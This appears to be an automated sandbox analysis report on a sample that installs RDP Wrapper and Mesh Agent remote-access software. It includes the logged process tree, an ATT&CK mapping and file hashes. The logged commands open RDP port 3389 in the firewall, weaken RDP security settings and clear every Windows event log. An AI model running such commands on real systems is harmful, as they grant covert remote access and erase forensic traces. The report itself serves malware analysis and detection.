C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"4⤵PID:972
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"5⤵PID:4780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul4⤵PID:2268
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"5⤵PID:1996
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.22000.469" /f4⤵PID:5136
-
-
C:\Windows\system32\findstr.exefindstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2460
-
-
C:\Windows\system32\PING.EXEping -n 1 google.com4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"4⤵PID:1748
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"5⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
PID:1712
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1240 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2404
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
PID:2156 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5384
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f4⤵PID:1936
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f4⤵PID:2060
-
-
C:\Windows\system32\findstr.exefindstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"4⤵PID:3396
-
-
C:\Windows\system32\PING.EXEping -n 1 google.com4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"4⤵PID:3232
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"5⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
PID:5324
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5708 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2668
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2416 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4636
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f4⤵PID:2588
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f4⤵PID:5756
-
-
C:\Windows\system32\findstr.exefindstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"4⤵PID:576
-
-
-
-
C:\Windows\system32\cmd.execmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""2⤵PID:1668
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5988
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5272
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:756
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:2400
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:5148
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1208 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:5384
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:5436
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:4876
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:460
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:5704
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:1020
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1744 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:908
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:2676
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:3812
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:3404
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4544
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:1080
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:816 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:5060
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:3232
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:3352
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:6132
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:1848
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5152
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3332 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1764
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:4532
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:3260
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:5260
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:5428
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3148
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4728 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:3364
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:4188
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:3024
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4476
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:4908
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:4060
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4904
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3944 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:884
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:1908
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:1080
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4876
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:5188
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:5180
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5780
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:6068 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4600
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:4936
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:3448
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4556
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:3240
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4552 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:5056
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:6052
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:5940
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4700
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:6108
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1836 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:3392
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:5244
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:5548
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:1472
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:6036
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:2976 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:2928
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:3136
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:456
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:3056
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5124 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4256
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:4148
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:6140
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
3Hidden Files and Directories
2Hidden Users
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153KB
MD5d47e43238ee88b3fe26c6b7ef6fce3c4
SHA107eb73b4198a7baa8a944cf3204d7f4591817384
SHA2566407d647537c7dff0b99f9ac48d9a04ba18aed4bd339b958e10ac6b8ab791bb1
SHA512cf6f7ebd2be7f48835a2266ca72a7b1f708cc652a09c0457e3234fa7c087693a60529b06c2800eba54b4650314e0f2d4f9c0cb9cb1dcefd73280f264a42f782b
-
Filesize
389KB
MD56e9c095e59bf32887b96bd758f0ead7d
SHA1bedeb8282cdd8973b4a60c992ee99dbf9807a207
SHA2561ec6ac47bca61e5bdd9284efc21adcfa5aeb4b35515b7992f4ab862b0ef2218f
SHA512774373815791ed67e008661bcb1293e9b502f6dbe413afd39dc141c752a7f6e3b951c6bcdb761958d2bcddc1e863562a011639c7685fc5b088855c24b2dad69e
-
Filesize
3.7MB
MD59065d79fe0436283f3957106d9c53700
SHA19edef111e8ce820573c5ea8b22939ad9e105b9b7
SHA25694fe946df0fdde2138394d7ec4437b7030600d3139ed7b96602466d4ba3c7535
SHA5124957784f6054fe73b4960fb89d5ce384bdaa7c8e2faee4f2cb7ff80fdf1f45370b450709be4671c3fbe7dab432f3447a03e568f4d31401d5542a2084667a5219
-
Filesize
334B
MD5e80745668fbb5a6412a2855ad333ef11
SHA16940a9ddd863cc17f14146c954e81308f8da4f8a
SHA256805adc33201c7ee282a042d2ccdeb1193c0732d66ca5ab649e8162759c2841df
SHA51299ab347b75ebb526fbec7e8e6a55c1635598ed377b9ee5ceefd5b597949892a758e20145d6845d20264091ec59d1c2e1772bf433ed773ea72ac4df86a8406f94
-
Filesize
501B
MD518c90f7e865e700fa93c92c75829da79
SHA11145ba84d5b04c4c34a1bcd26eaf98fa7d6aa57e
SHA256554c997b1a4a0843dcbe91a5c44ffbaa068cfb67b69922846c77613b2506599c
SHA5122dc8e0a8f91a9d1f843b86b79e21a8b374eadacb23d1c9e7c36e10fac9abc038c04b40be6c0ca644984485b455bfe9e2a86ecdfe57515e380f67d18956a13741
-
Filesize
668B
MD52a6e2eae7b98f49dbd8a43dc366efc64
SHA1fd6fbf73bc7db3e3f84fbcf367f149885723b71a
SHA2563c3234ac1c903e64784444e6ecee2fa993c6dfe2f517628134c5c01a6144d6ed
SHA512e8aed8b423e50a9b553df9cc547353df2943390f907373e3a3998ec030bb3eeecdfc5c90eadbe2f64411d56b005b4a2ffa866261ab41c0f0f64a1d9d8daef655
-
Filesize
31KB
MD5a45919647f6420ecb4eca54b1172c5c8
SHA1df5b0de8365711865fe5f47cb301afbd9b25596d
SHA25683133ec01c7d4167449ea120aa96d1d3bbb8a585de145f56f42d13fd7c35b6f7
SHA512cf081410989b91b2285133cd6d787cfb6ab0432ac66737950f2484326777f3fc520ac587ab291ca48dca6a83fa941efe174b3a14f77d9ae6f590d0ae48c9001e
-
Filesize
5KB
MD50f02cb50631bc2ed707c482e337d7e26
SHA12d0191aea9270bdbd0c3af861e7c9873435d86a3
SHA256b2caa22649d7c11bc3ab529ee5bad16eee6e933e4c1a19ae4c3d299bfd7abf7b
SHA5127b7e33424c02a7751f92e9bd7ea9f4f883823b5ddcb466031d8b8dc3fdd6b6cc1213a261d926a93cff54aac318b9b5c20dff17a7a701c15d78cd606d96bd52b9
-
Filesize
129KB
MD54ff0e05ee0b81a1e8c65775cbb939d97
SHA1198f4a5d7aaf89e24d0ca4fbe4805aa2a30122fd
SHA2567ea3029690494db514eb88a21ec922a7fc30595aeb3ab6ceffb23c47b35c5911
SHA5120a95439ca4ceae7c0c57c230e08ed396bd2b5ee199da70f2b5509d3ea572f922f5af1c55ed2f30ab2c6d2abf7b34763f76d252660c58efa9933aa4bb5c9d7133
-
Filesize
130KB
MD5e3b29a60edbbe09d6cc75f8793432a3d
SHA172932a473600e2194f8bfde29265df70e127845d
SHA2569668bd0398b543100a1389d68a90ea53b1479be79f698c9bd870773d05cb1579
SHA512ecf7cb83c3c181c1b0e23ded6052f596b31635a901a9bf47be38a23748e76b94adb424d2bf8c07d4d35f8ef0b07cbf5394af7b9cb53d0da73195ccbb65550350
-
Filesize
131KB
MD536f2f304ea7905b4d47e2f45af1e2940
SHA17a3040d6cfd5f58d7c3526869d411adf1ee23e62
SHA2565c17f5caae732ebb37dcff4e5f148178a82a680def3b51cb882642a63703b019
SHA5121c686dc0c19a4226e75322ad18e0e728d765c6df085bbe90acc2f285e683621f833a626590e2efc97d42cbc43a4984fe728915aea6566a0ac58ca540415f9229
-
Filesize
132KB
MD5d3c90f02de548c8dea592f6d2a0e3feb
SHA13c70944d08059e1fd4be347c8a56dddf41a63f16
SHA256c0055252f5a1e8f3d9750cebdefee565b160b572ac6977917c78bd5452802ebb
SHA5126a0164d5780f1af9582fb2a328c3134f5cba4c50b905d5c9216ea22eb3f5475846599c0e98e1a9d98bf5002ecd1c6975087ef85089b1823482ca15ee20ad89ec
-
Filesize
133KB
MD5959c3ce8acb8c1089ef0cb041a0eb5c9
SHA1e7d41246ce112345e6d8918b02159c50e173148a
SHA2561d882f6f153c6eb3325c07a0fc8b25a5dbaffe343cd2c559f1458bfdd74c12b3
SHA512e1dae3f35c96ff1b0dc61e30e10784c09f346e3015dfeea84197841cfac8f4a1e8e95c96a598fbff0f010be1bbb32efb79384347b7dc9ea7e199cfc4e2f1dfc7
-
Filesize
134KB
MD51d10fc6e824198a43a9c3cedaf3eadcb
SHA178693d1b156df401197a7d8a3ecf41684afcb7dd
SHA256518db8405c5fd5910255f82e582871a3e6c59103e2b7b4c8f35575f5d21cd22c
SHA51281f594875e137eb19fd31dc479303e9a61072ab5044ae8bcfdaa9c455a859f7e8a77d93d83eec2091c045cbef750c7e9aabf190059ef3153a9cbacf3b99f24f8
-
Filesize
136KB
MD57437ff9227834958cd8d13afc91f8856
SHA101f598ed3cbddc56e9d619099e86e0cc0368577e
SHA256c2d66e92a232aa51d6a208d4fed96806effc9020ca71a33103e05f388edb6b43
SHA512be7b0cf9095a078d4dbd08a78b4e0feae5316bdb76adfdc900abcba7ca80e82294f9993eaf2a866e7ed2affb8e81ee070b7f19cced30249f9af59d82d084f0e7
-
Filesize
13KB
MD5e3776087adc7bd1c1eefd535ef7a70d9
SHA151272e24aa2d913ed8f7e46c1a15bdb900803ce4
SHA256da49baeb183185509fccf55b8414e5286ab4575952e43f8306d049b601854d2d
SHA51259f231e4f6f0fe3f051284ebfd6d447e9bfe15c4e0f465bc98f6595ca7fae4d82dce2876a2e67275da8f845e94d6d875d25325575bab71ff2b662c38b62ce4b5
-
Filesize
648B
MD5cb375c192eb771244de592f37489f13c
SHA14e2b5cf74d92e7ed7e37f3cda66752ae03ff9215
SHA25687cc27787aaa38a34f0e607d3453ac47f78cc607a91e27e354fd7bbbcc4b0f86
SHA5127c4b184f17860560a3795cc46aa951ffd461fcb1459f9e36acd4b3f6291e0c445b4f95bdb3418314aacb7f3da0a668ae0e5cf2b347f31ffeb67567d22579f21c
-
Filesize
343B
MD57041389639fa540a18907ed804c3adde
SHA12ab09f41cc2398a413648d168e26e866890e8819
SHA2563f04002d1ba7b44e66a461a6d0786726e3f2309c4645b8640fd5a3799bf06b70
SHA51211ade3094bd78f5defac81735742c966b33c9fbf9ebd954ea7c9528e753049b25e509ddb6e98661b33f1a3a75dff17c20498f465b752a5728cfd07e7351e3a95
-
Filesize
3KB
MD55c5e39bd05c1396c80eb209f02364dfa
SHA1f05fa03f814be7145218dec7d9895d25aaad9dab
SHA2563786dfadabf9429930d58e32b2f4d49813cea7c0bbee1a556dadfc912eebda02
SHA5124b2a9980db33bbf9c1654afc1f9f32e31e8d84f29571b995598079ee0eae84b7ee876c5dbdb2c3a5725016839f594ecf22a2c45f835fd18866f23eda2170fe0e
-
Filesize
1.5MB
MD50220e75b22e87585fa065121761e9e2d
SHA13c2b019c4bde007ffca05bca8b75ad3951a4a9a0
SHA2566acb1127d03b01b533501943a559e2ef33be1788cbf9b64d5617ae5ccba92446
